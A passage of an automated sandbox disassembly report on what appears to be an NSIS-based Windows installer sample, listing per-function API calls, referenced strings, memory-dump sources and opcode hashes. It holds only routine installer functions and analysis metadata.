                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
                                                                      • GetMessagePos.USER32 ref: 004049F1
                                                                      • ScreenToClient.USER32(?,?), ref: 00404A0B
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                      • Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
                                                                      • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                      • Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94
                                                                      APIs
                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402CF8
                                                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402D23
                                                                      • wsprintfA.USER32 ref: 00402D33
                                                                      • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402D2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
                                                                      • Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
                                                                      • Opcode Fuzzy Hash: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
                                                                      • Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                      • wsprintfA.USER32 ref: 00406367
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040637B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195
                                                                      • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                      • Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
                                                                      • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                      • Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                      • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
                                                                      • Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
                                                                      • Opcode Fuzzy Hash: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
                                                                      • Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134
                                                                      • Opcode ID: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
                                                                      • Instruction ID: 58bd5faada6d9be10f0d72f5de6cba59a90cc667517f98c73a934b571b6f9a01
                                                                      • Opcode Fuzzy Hash: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
                                                                      • Instruction Fuzzy Hash: 23414F71900209EBCB10DF65DA4479E7BB8EF08756F14813BE911BA2E0C7799B41CB9D
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 00402095
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                        • Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                        • Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                      • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 004020A5
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040211F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID: /z
                                                                      • API String ID: 2987980305-1190999251
                                                                      • Opcode ID: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
                                                                      • Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
                                                                      • Opcode Fuzzy Hash: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
                                                                      • Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E
                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,007A9000,75573410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                      • CharNextA.USER32(?,007A9000,75573410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                      • CharPrevA.USER32(?,?,75573410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: *?|<>/":
                                                                      • API String ID: 589700163-165019052
                                                                      • Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                      • Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
                                                                      • Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                      • Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 00401798
                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A3E8,0040A3E8,00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 004017C2
                                                                        • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                        • Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                        • Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 1941528284-0
                                                                      • Opcode ID: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
                                                                      • Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
                                                                      • Opcode Fuzzy Hash: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
                                                                      • Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E
                                                                      APIs
                                                                      • GetDlgItem.USER32(?), ref: 00401D58
                                                                      • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                      • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                      • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                      • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
                                                                      • Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
                                                                      • Opcode Fuzzy Hash: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
                                                                      • Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401E02
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                      • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
                                                                      • Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
                                                                      • Opcode Fuzzy Hash: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
                                                                      • Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D
                                                                      APIs
                                                                      • CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
                                                                      • CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
                                                                      • CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: :$\
                                                                      • API String ID: 3213498283-1166558509
                                                                      • Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                      • Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
                                                                      • Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                      • Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA
                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                      • Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
                                                                      • Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                      • Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                      • wsprintfA.USER32 ref: 0040496A
                                                                      • SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
                                                                      • Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
                                                                      • Opcode Fuzzy Hash: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
                                                                      • Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8
                                                                      APIs
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
                                                                      • Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
                                                                      • Opcode Fuzzy Hash: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
                                                                      • Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8
                                                                      APIs
                                                                      • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 0040561D
                                                                      • GetLastError.KERNEL32 ref: 00405631
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
                                                                      • GetLastError.KERNEL32 ref: 00405650
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID:
                                                                      • API String ID: 3449924974-0
                                                                      • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                      • Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
                                                                      • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                      • Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,00000000,00402F3E,?), ref: 00402D73
                                                                      • GetTickCount.KERNEL32 ref: 00402D91
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                      • Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
                                                                      • Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                      • Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C
                                                                      APIs
                                                                        • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45
                                                                      • lstrlenA.KERNEL32(007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AC6
